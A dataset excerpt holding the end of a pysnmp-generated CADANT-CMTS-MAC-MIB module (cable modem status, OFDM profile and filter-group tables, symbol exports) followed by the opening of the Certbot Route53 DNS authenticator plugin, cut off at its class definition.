if mibBuilder.loadTexts: cadQosServiceClassCmControlEntry.setStatus('current')
cadQosServiceClassCmControlSendDscMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2, 1, 1), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadQosServiceClassCmControlSendDscMacAddr.setStatus('current')
cadIfCmtsCmOfdmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32), )
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusTable.setStatus('current')
cadIfCmtsCmOfdmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmStatusMacAddress"))
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusEntry.setStatus('current')
cadIfCmtsCmOfdmStatusMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusMacAddress.setStatus('current')
cadIfCmtsCmOfdmStatusOkOfdmMod = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 2), CerOfdmModBitsType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusOkOfdmMod.setStatus('current')
cadIfCmtsCmOfdmStatusOkOfdmaMod = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 3), CerOfdmModBitsType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusOkOfdmaMod.setStatus('current')
cadIfCmtsCmOfdmStatusDsLowFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusDsLowFreq.setStatus('current')
cadIfCmtsCmOfdmStatusDsHighFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusDsHighFreq.setStatus('current')
cadIfCmtsCmOfdmStatusUsHighFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 32, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmStatusUsHighFreq.setStatus('current')
cadIfCmtsCmOfdmProfTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33), )
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfTable.setStatus('current')
cadIfCmtsCmOfdmProfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfIfIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmOfdmProfProfId"))
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfEntry.setStatus('current')
cadIfCmtsCmOfdmProfMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfMacAddress.setStatus('current')
cadIfCmtsCmOfdmProfIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfIfIndex.setStatus('current')
cadIfCmtsCmOfdmProfProfId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 3), OfdmProfileId())
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfProfId.setStatus('current')
cadIfCmtsCmOfdmProfDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 4), IfDirection()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfDirection.setStatus('current')
cadIfCmtsCmOfdmProfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 33, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("active", 1), ("impaired", 2))).clone('active')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadIfCmtsCmOfdmProfStatus.setStatus('current')
cadSubmgtFilterGrpDescTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34), )
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescTable.setStatus('current')
cadSubmgtFilterGrpDescEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadSubmgtFilterGrpId"))
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescEntry.setStatus('current')
cadSubmgtFilterGrpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024)))
if mibBuilder.loadTexts: cadSubmgtFilterGrpId.setStatus('current')
cadSubmgtFilterGrpDescription = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 2), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 32)).clone(hexValue="")).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadSubmgtFilterGrpDescription.setStatus('current')
cadSubmgtFilterGrpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 34, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadSubmgtFilterGrpRowStatus.setStatus('current')
mibBuilder.exportSymbols("CADANT-CMTS-MAC-MIB", cadIfCmtsMacToInetIpEntry=cadIfCmtsMacToInetIpEntry, cadCmtsCmStatusNumRegistered=cadCmtsCmStatusNumRegistered, cadCmtsCmStatusMacNumRegFlaps=cadCmtsCmStatusMacNumRegFlaps, cadIfCmtsCmStatusModulationType=cadIfCmtsCmStatusModulationType, cadCmtsCmStatusSummaryEntry=cadCmtsCmStatusSummaryEntry, cadIfCmtsCmCountsRangeReqReceived=cadIfCmtsCmCountsRangeReqReceived, cadIfCmtsCmOfdmStatusDsLowFreq=cadIfCmtsCmOfdmStatusDsLowFreq, cadIfCmtsMacToInetIpAddrType=cadIfCmtsMacToInetIpAddrType, cadCmtsCmStatusMacChNumStartDhcpv4=cadCmtsCmStatusMacChNumStartDhcpv4, cadIfCmtsCmCountsRxPower=cadIfCmtsCmCountsRxPower, cadSubMgtCmFilterUpstream=cadSubMgtCmFilterUpstream, cadCmtsCmStatusMacNumBpiInit=cadCmtsCmStatusMacNumBpiInit, cadIfCmtsInetIpCmMac=cadIfCmtsInetIpCmMac, cadIf3CmtsCmRegStatusIPv6LinkLocal=cadIf3CmtsCmRegStatusIPv6LinkLocal, cadIfCmtsCmOfdmProfDirection=cadIfCmtsCmOfdmProfDirection, cadIfQosProfileLookupTable=cadIfQosProfileLookupTable, cadIfCmtsServiceMacAddress=cadIfCmtsServiceMacAddress, cadCmtsCmStatusMacNumStartDhcpv6=cadCmtsCmStatusMacNumStartDhcpv6, cadSubmgtFilterGrpDescTable=cadSubmgtFilterGrpDescTable, cadSubMgtCpeIpAddrType=cadSubMgtCpeIpAddrType, cadIfCmtsMacToInetIpCmMacAddr=cadIfCmtsMacToInetIpCmMacAddr, cadIfCmtsInetIpToCmMacEntry=cadIfCmtsInetIpToCmMacEntry, cadIfCmtsCmStatusLastDsPenaltyDuration=cadIfCmtsCmStatusLastDsPenaltyDuration, cadIf3CmtsCmRegStatusEnergyMgtOperStatus=cadIf3CmtsCmRegStatusEnergyMgtOperStatus, PYSNMP_MODULE_ID=cadMacMib, cadSubMgtCpeIpMacAddr=cadSubMgtCpeIpMacAddr, cadIfCmtsCmOfdmProfMacAddress=cadIfCmtsCmOfdmProfMacAddress, cadIfCmtsCmPtr=cadIfCmtsCmPtr, cadCmDenyEntry=cadCmDenyEntry, cadSubMgtPsFilterDownstream=cadSubMgtPsFilterDownstream, cadIf3CmtsCmRegStatusMdIfIndex=cadIf3CmtsCmRegStatusMdIfIndex, cadQosCmtsMacToSrvFlowTable=cadQosCmtsMacToSrvFlowTable, cadCmtsCmStatusNumRanging=cadCmtsCmStatusNumRanging, cadMacClearFlapCountMacAddr=cadMacClearFlapCountMacAddr, cadCmtsCmStatusNumIpComplete=cadCmtsCmStatusNumIpComplete, cadSubMgtCpeControlActive=cadSubMgtCpeControlActive, cadCmtsCmStatusMacChNumStartEae=cadCmtsCmStatusMacChNumStartEae, cadQosServiceClassLatencyControlledFlowFlag=cadQosServiceClassLatencyControlledFlowFlag, cadCmtsCmStatusMacSummaryEntry=cadCmtsCmStatusMacSummaryEntry, cadCmtsCmStatusMacChNumRfMuteAll=cadCmtsCmStatusMacChNumRfMuteAll, cadSubmgtFilterGrpDescEntry=cadSubmgtFilterGrpDescEntry, cadIfCmtsCmOfdmProfProfId=cadIfCmtsCmOfdmProfProfId, cadQosServiceFlowSidClusterSid=cadQosServiceFlowSidClusterSid, cadEnforceRuleTableLastChange=cadEnforceRuleTableLastChange, cadIfCmtsCmOfdmStatusOkOfdmMod=cadIfCmtsCmOfdmStatusOkOfdmMod, cadIfCmtsCmOfdmProfEntry=cadIfCmtsCmOfdmProfEntry, cadIfCmtsInetIpCpeMac=cadIfCmtsInetIpCpeMac, cadEnforceRuleAvgBwRateUsageTrigger=cadEnforceRuleAvgBwRateUsageTrigger, cadCmDenyStatusTable=cadCmDenyStatusTable, cadSubMgtCpeIpTable=cadSubMgtCpeIpTable, cadCmtsCmStatusNumRegFlaps=cadCmtsCmStatusNumRegFlaps, cadCmtsCmStatusMacNumOther=cadCmtsCmStatusMacNumOther, cadIfCmtsMacToIpTable=cadIfCmtsMacToIpTable, cadCmtsCmStatusMacNumCfgFileDownloadComplete=cadCmtsCmStatusMacNumCfgFileDownloadComplete, cadCmtsCmStatusMacChNumStartDhcpv6=cadCmtsCmStatusMacChNumStartDhcpv6, cadIfCmtsCmOfdmStatusUsHighFreq=cadIfCmtsCmOfdmStatusUsHighFreq, cadArpType=cadArpType, cadCmDenyRowStatus=cadCmDenyRowStatus, cadIfQosProfBaselinePrivacy=cadIfQosProfBaselinePrivacy, cadIf3CmtsCmStatsEm1x1ModeEntryTime=cadIf3CmtsCmStatsEm1x1ModeEntryTime, 
cadIf3CmtsCmRegStatusEnergyMgtCapability=cadIf3CmtsCmRegStatusEnergyMgtCapability, cadIfCmtsCmStatusDynamicSecretFailed=cadIfCmtsCmStatusDynamicSecretFailed, cadSubMgtCmFilterDownstream=cadSubMgtCmFilterDownstream, cadIfCmtsCmStatuseDocsisTypes=cadIfCmtsCmStatuseDocsisTypes, cadIfCmtsInetIpMacAddrType=cadIfCmtsInetIpMacAddrType, cadCmtsCmStatusMacNumStartEae=cadCmtsCmStatusMacNumStartEae, cadIf3CmtsCmStatsEm1x1ModeTotalDuration=cadIf3CmtsCmStatsEm1x1ModeTotalDuration, cadIfCmtsCmStatusTftpEnforceFailed=cadIfCmtsCmStatusTftpEnforceFailed, cadMacDeleteMacAddress=cadMacDeleteMacAddress, cadIfCmtsCmCountsUncorrectables=cadIfCmtsCmCountsUncorrectables, cadSubMgtCpeIpEntry=cadSubMgtCpeIpEntry, cadIfCmtsCmStatusBpiVersion=cadIfCmtsCmStatusBpiVersion, cadIfCmtsPtrToMacEntry=cadIfCmtsPtrToMacEntry, cadCmtsCmStatusMacChNumOperational=cadCmtsCmStatusMacChNumOperational, cadQosServiceClassControlEntry=cadQosServiceClassControlEntry, cadMacClearPenaltyCountScn=cadMacClearPenaltyCountScn, cadSubMgtStbFilterDownstream=cadSubMgtStbFilterDownstream, cadIfCmtsCmCountsTimingOffset=cadIfCmtsCmCountsTimingOffset, cadCmtsCmStatusNumRegistrationComplete=cadCmtsCmStatusNumRegistrationComplete, cadCmtsCmStatusNumTotal=cadCmtsCmStatusNumTotal, cadCmtsCmStatusMacChNumRangingComplete=cadCmtsCmStatusMacChNumRangingComplete, cadMacResetCMMacAddress=cadMacResetCMMacAddress, cadQosServiceClassCmControlTable=cadQosServiceClassCmControlTable, cadCmtsCmVendorTable=cadCmtsCmVendorTable, cadIfCmtsCmCountsTable=cadIfCmtsCmCountsTable, cadSubMgtCpeControlEntry=cadSubMgtCpeControlEntry, cadCpeHostAuthorizationTable=cadCpeHostAuthorizationTable, cadEnforceRuleStatus=cadEnforceRuleStatus, cadCmtsCmStatusNumOther=cadCmtsCmStatusNumOther, cadTpFdbTable=cadTpFdbTable, cadMacClearDenyCountMacAddr=cadMacClearDenyCountMacAddr, cadCmtsCmStatusMacChNumDhcpv6Complete=cadCmtsCmStatusMacChNumDhcpv6Complete, cadTpFdbStatus=cadTpFdbStatus, cadIfCmtsCmStatusValue=cadIfCmtsCmStatusValue, cadIfCmtsCmOfdmStatusMacAddress=cadIfCmtsCmOfdmStatusMacAddress, cadIfCmtsCmStatusInetIpAddress=cadIfCmtsCmStatusInetIpAddress, cadIfCmtsServiceEntry=cadIfCmtsServiceEntry, cadCmtsCmStatusMacNumRfMuteAll=cadCmtsCmStatusMacNumRfMuteAll, cadQosServiceClassControl=cadQosServiceClassControl, cadSubMgtMtaFilterDownstream=cadSubMgtMtaFilterDownstream, cadCmtsCmStatusMacNumDhcpv4Complete=cadCmtsCmStatusMacNumDhcpv4Complete, cadEnforceRuleCountsEntry=cadEnforceRuleCountsEntry, cadIfCmtsInetIpMac=cadIfCmtsInetIpMac, cadMacClearDenyCounts=cadMacClearDenyCounts, cadIfCmtsServiceAdminStatus=cadIfCmtsServiceAdminStatus, cadCmtsCmStatusNumRangingAborted=cadCmtsCmStatusNumRangingAborted, cadCpeHostAuthRowStatus=cadCpeHostAuthRowStatus, cadCmtsCmStatusMacNumInitRanging=cadCmtsCmStatusMacNumInitRanging, cadIfCmtsCmStatusNumber=cadIfCmtsCmStatusNumber, cadQosServiceFlowSegHdr=cadQosServiceFlowSegHdr, cadEnforceRuleEntry=cadEnforceRuleEntry, cadQosServiceClassControlTable=cadQosServiceClassControlTable, cadEnforceRuleAvgHistoryDuration=cadEnforceRuleAvgHistoryDuration, cadIf3CmtsCmRegStatusRcsId=cadIf3CmtsCmRegStatusRcsId, cadIfCmtsMacInetIpAddrType=cadIfCmtsMacInetIpAddrType, cadIf3CmtsCmRegStatusEnergyMgtEnabled=cadIf3CmtsCmRegStatusEnergyMgtEnabled, cadIfCmtsCmStatusDocsisVersion=cadIfCmtsCmStatusDocsisVersion, cadIfCmtsCmCountsSignalNoise=cadIfCmtsCmCountsSignalNoise, cadCmtsCmStatusMacNumProvFlaps=cadCmtsCmStatusMacNumProvFlaps, cadArpNetAddress=cadArpNetAddress, cadIfCmtsCmStatusConfigFilename=cadIfCmtsCmStatusConfigFilename, 
cadSubMgtCpeControlTable=cadSubMgtCpeControlTable, cadCpeHostAuthCpeIpAddress=cadCpeHostAuthCpeIpAddress, cadIfCmtsCmCountsUpChIfIndex=cadIfCmtsCmCountsUpChIfIndex, cadIfCmtsCmCountsCorrecteds=cadIfCmtsCmCountsCorrecteds, cadCmDenyAttempts=cadCmDenyAttempts, cadCpeHostAuthorizationEntry=cadCpeHostAuthorizationEntry, cadCmtsCmStatusMacChNumBpiInit=cadCmtsCmStatusMacChNumBpiInit, cadSubMgtCmFilterTable=cadSubMgtCmFilterTable, cadIfCmtsCmCountsEntry=cadIfCmtsCmCountsEntry, cadChannelToCmEntry=cadChannelToCmEntry, cadArpMacAddress=cadArpMacAddress, cadCmtsCmStatusMacNumStartRegistration=cadCmtsCmStatusMacNumStartRegistration, cadIfCmtsMacToInetIpTable=cadIfCmtsMacToInetIpTable, cadIfCmtsCmStatusProvFlaps=cadIfCmtsCmStatusProvFlaps, cadCmtsCmVendorEntry=cadCmtsCmVendorEntry, cadIfCmtsCmOfdmStatusTable=cadIfCmtsCmOfdmStatusTable, cadMacMib=cadMacMib, cadIfCmtsPtrToMacTable=cadIfCmtsPtrToMacTable, cadCmtsCmStatusMacChNumStartRegistration=cadCmtsCmStatusMacChNumStartRegistration, cadCmtsCmStatusMacChNumRegistrationComplete=cadCmtsCmStatusMacChNumRegistrationComplete, cadIfCmtsCmStatusBpiEnabled=cadIfCmtsCmStatusBpiEnabled, cadQosServiceClassCmControlSendDscMacAddr=cadQosServiceClassCmControlSendDscMacAddr, cadCmtsCmStatusMacNumDhcpv6Complete=cadCmtsCmStatusMacNumDhcpv6Complete, cadEnforceRulePenaltyDuration=cadEnforceRulePenaltyDuration, cadIfCmtsMacToInetIpAddr=cadIfCmtsMacToInetIpAddr, cadIf3CmtsCmRegStatusTcsId=cadIf3CmtsCmRegStatusTcsId, cadEnforceRule=cadEnforceRule, cadSubmgtFilterGrpDescription=cadSubmgtFilterGrpDescription, cadCmtsCmStatusNumOperational=cadCmtsCmStatusNumOperational, cadIfCmtsCmCountsTxPower=cadIfCmtsCmCountsTxPower, cadCmDenyRecentTime=cadCmDenyRecentTime, cadIfQosProfileLookupRefCount=cadIfQosProfileLookupRefCount, cadIfCmtsCmStatusUsPenalties=cadIfCmtsCmStatusUsPenalties, cadIf3CmtsCmRegStatusMdCmSgId=cadIf3CmtsCmRegStatusMdCmSgId, cadSubMgtCpeControlReset=cadSubMgtCpeControlReset, cadIfCmtsCmStatusUpChannelIfIndex=cadIfCmtsCmStatusUpChannelIfIndex, cadQosServiceClassPeakTrafficRate=cadQosServiceClassPeakTrafficRate, cadIfCmtsCmStatusLastUsPenaltyStart=cadIfCmtsCmStatusLastUsPenaltyStart, cadEnforceRuleCountsPenalties=cadEnforceRuleCountsPenalties, cadCmtsCmStatusMacChNumInitRanging=cadCmtsCmStatusMacChNumInitRanging, cadQosServiceFlowSidClusterChIfIndex=cadQosServiceFlowSidClusterChIfIndex, cadEnforceRuleCountsTable=cadEnforceRuleCountsTable, cadIfCmtsCmStatusInitRangTime=cadIfCmtsCmStatusInitRangTime, cadIfCmtsCmOfdmStatusDsHighFreq=cadIfCmtsCmOfdmStatusDsHighFreq, cadQosServiceClassCmControlEntry=cadQosServiceClassCmControlEntry, cadQosCmtsMacToSrvFlowEntry=cadQosCmtsMacToSrvFlowEntry, cadCmtsCmStatusMacChSummaryTable=cadCmtsCmStatusMacChSummaryTable, cadIfCmtsCmStatusDocsCapability=cadIfCmtsCmStatusDocsCapability, cadIfQosProfMaxUpBandwidth=cadIfQosProfMaxUpBandwidth, cadMacClearFlapCounts=cadMacClearFlapCounts, cadCmtsCmStatusMacChNumRangingAborted=cadCmtsCmStatusMacChNumRangingAborted, cadIfCmtsCmStatusModemType=cadIfCmtsCmStatusModemType, cadCmtsCmStatusNumAccessDenied=cadCmtsCmStatusNumAccessDenied, cadIfQosProfMaxDownBandwidth=cadIfQosProfMaxDownBandwidth, cadCmtsCmStatusMacNumStartDhcpv4=cadCmtsCmStatusMacNumStartDhcpv4, cadMacClearFlapCountsByIfIndex=cadMacClearFlapCountsByIfIndex, cadIfCmtsCmOfdmProfStatus=cadIfCmtsCmOfdmProfStatus, cadQosServiceFlowSidClusterUcid=cadQosServiceFlowSidClusterUcid, cadSubMgtCpeFilterDownstream=cadSubMgtCpeFilterDownstream, cadArpIfIndex=cadArpIfIndex, cadQosServiceFlowSidClusterTable=cadQosServiceFlowSidClusterTable, 
cadIfCmtsCmStatusEntry=cadIfCmtsCmStatusEntry, cadIfCmtsCmOfdmStatusOkOfdmaMod=cadIfCmtsCmOfdmStatusOkOfdmaMod, cadQosCmtsIfIndex=cadQosCmtsIfIndex, cadIfCmtsCmOfdmProfTable=cadIfCmtsCmOfdmProfTable, cadArpL3IfIndex=cadArpL3IfIndex, cadCmtsCmVendorRowStatus=cadCmtsCmVendorRowStatus, cadIfCmtsCmCountsRangeReqOpportunities=cadIfCmtsCmCountsRangeReqOpportunities, cadCpeHostAuthCmMacAddress=cadCpeHostAuthCmMacAddress, cadEnforceRuleSamplingInterval=cadEnforceRuleSamplingInterval, cadSubMgtCpeControlMaxCpeIpv4=cadSubMgtCpeControlMaxCpeIpv4, cadIf3CmtsCmRegStatusRccStatusId=cadIf3CmtsCmRegStatusRccStatusId, cadIfQosProfileLookupIndex=cadIfQosProfileLookupIndex, cadArpState=cadArpState, cadChannelToCmPtr=cadChannelToCmPtr, cadCmtsCmStatusMacChNumForwardingDisabled=cadCmtsCmStatusMacChNumForwardingDisabled, cadIf3CmtsCmRegStatusRcpId=cadIf3CmtsCmRegStatusRcpId, cadIfCmtsCmCountsPowerAdjExceedsThreshold=cadIfCmtsCmCountsPowerAdjExceedsThreshold, cadSubMgtCpeControlLastReset=cadSubMgtCpeControlLastReset, cadIfCmtsCmStatusRangFlaps=cadIfCmtsCmStatusRangFlaps, cadIfCmtsCmStatusDownChannelIfIndex=cadIfCmtsCmStatusDownChannelIfIndex, cadCmDenyTable=cadCmDenyTable, cadIfCmtsCmStatusInetIpAddrType=cadIfCmtsCmStatusInetIpAddrType, cadEnforceRuleReferenceSCN=cadEnforceRuleReferenceSCN, cadMacControl=cadMacControl, cadCmtsCmStatusNumProvFlaps=cadCmtsCmStatusNumProvFlaps, cadMacClearPenaltyCounts=cadMacClearPenaltyCounts, cadCmtsCmStatusMacChNumDhcpv4Complete=cadCmtsCmStatusMacChNumDhcpv4Complete, cadCmtsCmStatusMacNumStartCfgFileDownload=cadCmtsCmStatusMacNumStartCfgFileDownload, cadIfCmtsCmStatusInsertionFlaps=cadIfCmtsCmStatusInsertionFlaps, cadEnforceRuleTable=cadEnforceRuleTable, cadIfQosProfMaxTxBurst=cadIfQosProfMaxTxBurst, cadCmDenyRecentIfIndex=cadCmDenyRecentIfIndex, cadIfHVCmtsCmStatusInitRangTime=cadIfHVCmtsCmStatusInitRangTime, cadCmtsCmStatusMacNumRangFlaps=cadCmtsCmStatusMacNumRangFlaps, cadChannelToCmTable=cadChannelToCmTable, cadIfCmtsServiceTable=cadIfCmtsServiceTable, cadSubMgtCmFilterEntry=cadSubMgtCmFilterEntry, cadIfCmtsCmOfdmStatusEntry=cadIfCmtsCmOfdmStatusEntry, cadSubMgtStbFilterUpstream=cadSubMgtStbFilterUpstream, cadIfCmtsServiceId=cadIfCmtsServiceId, cadSubMgtCpeIpIndex=cadSubMgtCpeIpIndex, cadQosServiceClassEntry=cadQosServiceClassEntry, cadCmtsCmStatusMacNumOperational=cadCmtsCmStatusMacNumOperational, cadQosServiceFlowSidClusterEntry=cadQosServiceFlowSidClusterEntry, cadIfCmtsMacCmMacAddr=cadIfCmtsMacCmMacAddr, cadCmtsCmStatusMacNumForwardingDisabled=cadCmtsCmStatusMacNumForwardingDisabled, cadIfCmtsCmStatusLastDsPenaltyStart=cadIfCmtsCmStatusLastDsPenaltyStart, cadIfCmtsCmStatusDocsProvisioned=cadIfCmtsCmStatusDocsProvisioned, cadIfCmtsCmStatusRxAcPowerLost=cadIfCmtsCmStatusRxAcPowerLost, cadArpTable=cadArpTable, cadIfCmtsServiceQosProfile=cadIfCmtsServiceQosProfile, cadCmtsCmStatusMacChNumProvFlaps=cadCmtsCmStatusMacChNumProvFlaps, cadSubMgtCpeControlMaxCpeIpv6Addresses=cadSubMgtCpeControlMaxCpeIpv6Addresses, cadQosServiceClassControlSendDscLastUpdated=cadQosServiceClassControlSendDscLastUpdated, cadCmtsCmStatusMacChNumOther=cadCmtsCmStatusMacChNumOther, cadIfCmtsCmStatusDsPenalties=cadIfCmtsCmStatusDsPenalties, cadSubmgtFilterGrpRowStatus=cadSubmgtFilterGrpRowStatus, cadIfCmtsServiceCreateTime=cadIfCmtsServiceCreateTime, cadCmtsCmStatusMacNumRangingComplete=cadCmtsCmStatusMacNumRangingComplete, cadCmtsCmStatusNumRangFlaps=cadCmtsCmStatusNumRangFlaps, cadIfCmtsCmMac=cadIfCmtsCmMac, cadCmtsCmStatusNumActive=cadCmtsCmStatusNumActive, 
cadIfCmtsCmOfdmProfIfIndex=cadIfCmtsCmOfdmProfIfIndex, cadTpFdbAddress=cadTpFdbAddress, cadQosCmtsServiceFlowId=cadQosCmtsServiceFlowId, cadQosServiceClassTable=cadQosServiceClassTable, cadCmtsCmStatusMacChNumTotal=cadCmtsCmStatusMacChNumTotal, cadCmtsCmStatusMacNumRangingAborted=cadCmtsCmStatusMacNumRangingAborted, cadCmDenyMacAddress=cadCmDenyMacAddress, cadCmtsCmStatusSummaryTable=cadCmtsCmStatusSummaryTable, cadCmtsCmStatusMacChNumStartCfgFileDownload=cadCmtsCmStatusMacChNumStartCfgFileDownload, cadIfCmtsInetIpToCmMacTable=cadIfCmtsInetIpToCmMacTable)
mibBuilder.exportSymbols("CADANT-CMTS-MAC-MIB", cadIfCmtsCmStatusCmPtr=cadIfCmtsCmStatusCmPtr, cadCmtsCmStatusMacNumRegistrationComplete=cadCmtsCmStatusMacNumRegistrationComplete, cadCmDenyStatusEntry=cadCmDenyStatusEntry, cadSubMgtSubFilterUpstream=cadSubMgtSubFilterUpstream, cadIfCmtsCmStatusPreFlapStatus=cadIfCmtsCmStatusPreFlapStatus, cadCmtsCmStatusMacChSummaryEntry=cadCmtsCmStatusMacChSummaryEntry, cadCmtsCmStatusMacChNumCfgFileDownloadComplete=cadCmtsCmStatusMacChNumCfgFileDownloadComplete, cadIf3CmtsCmRegStatusIPv6Addr=cadIf3CmtsCmRegStatusIPv6Addr, cadIfCmtsCmStatusLastUsPenaltyDuration=cadIfCmtsCmStatusLastUsPenaltyDuration, cadSubMgtCpeIpLearned=cadSubMgtCpeIpLearned, cadCmtsCmStatusNumRegisteredBpiInitializing=cadCmtsCmStatusNumRegisteredBpiInitializing, cadCmtsCmStatusMacNumTotal=cadCmtsCmStatusMacNumTotal, cadIfCmtsCmCountsEqualizationData=cadIfCmtsCmCountsEqualizationData, cadSubMgtCpeControlLearnable=cadSubMgtCpeControlLearnable, cadCmtsCmVendorName=cadCmtsCmVendorName, cadCmtsCmStatusMacSummaryTable=cadCmtsCmStatusMacSummaryTable, cadIfQosProfileLookupEntry=cadIfQosProfileLookupEntry, cadCmtsCmStatusNumRangingComplete=cadCmtsCmStatusNumRangingComplete, cadIfCmtsCmCountsUnerroreds=cadIfCmtsCmCountsUnerroreds, cadMacRecalculateCmSummaryIfIndex=cadMacRecalculateCmSummaryIfIndex, cadSubmgtFilterGrpId=cadSubmgtFilterGrpId, cadIfCmtsCmStatusTable=cadIfCmtsCmStatusTable, cadIfQosProfPriority=cadIfQosProfPriority, cadIfQosProfGuarUpBandwidth=cadIfQosProfGuarUpBandwidth, cadMacClearPenaltyCountMacAddr=cadMacClearPenaltyCountMacAddr, cadCmtsCmStatusMacChNumRegFlaps=cadCmtsCmStatusMacChNumRegFlaps, cadIfCmtsMacToIpEntry=cadIfCmtsMacToIpEntry, cadSubMgtMtaFilterUpstream=cadSubMgtMtaFilterUpstream, cadSubMgtSubFilterDownstream=cadSubMgtSubFilterDownstream, cadIfCmtsCmStatusLastFlapTime=cadIfCmtsCmStatusLastFlapTime, cadCmtsCmStatusMacChNumRangFlaps=cadCmtsCmStatusMacChNumRangFlaps, cadSubMgtCpeIpAddr=cadSubMgtCpeIpAddr, cadArpAddressType=cadArpAddressType, cadSubMgtPsFilterUpstream=cadSubMgtPsFilterUpstream, CadIfCmtsCmStatusType=CadIfCmtsCmStatusType, cadIfHVCmtsCmStatusLastFlapTime=cadIfHVCmtsCmStatusLastFlapTime, cadIfCmtsCmStatusRegFlaps=cadIfCmtsCmStatusRegFlaps, cadIf3CmtsCmRegStatusServiceType=cadIf3CmtsCmRegStatusServiceType, cadEnforceRuleEnforceSCN=cadEnforceRuleEnforceSCN, cadSubMgtCpeCpeType=cadSubMgtCpeCpeType, cadQosServiceClassControlSendDsc=cadQosServiceClassControlSendDsc, cadIfCmtsMacAddr=cadIfCmtsMacAddr, cadIfCmtsMacInetIpAddr=cadIfCmtsMacInetIpAddr, cadArpEntry=cadArpEntry, cadCpeHostAuthCpeMacAddress=cadCpeHostAuthCpeMacAddress, cadTpFdbIfIndex=cadTpFdbIfIndex, cadMacClearPenaltyCountsByIfIndex=cadMacClearPenaltyCountsByIfIndex, cadIfCmtsCmStatusMacAddress=cadIfCmtsCmStatusMacAddress, cadTpFdbEntry=cadTpFdbEntry, cadSubMgtCpeFilterUpstream=cadSubMgtCpeFilterUpstream, cadIf3CmtsCmRegStatusLastRegTime=cadIf3CmtsCmRegStatusLastRegTime, cadEnforceRuleCreateTime=cadEnforceRuleCreateTime, cadQosCmtsCmMac=cadQosCmtsCmMac, cadCmtsCmVendorOUI=cadCmtsCmVendorOUI)
|
py | 7dfaceb327eafad33f9f728ac48e51f12ef9dd25 | """Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
logger = logging.getLogger(__name__)
INSTRUCTIONS = (
"To use certbot-dns-route53, configure credentials as described at "
"https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
"and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
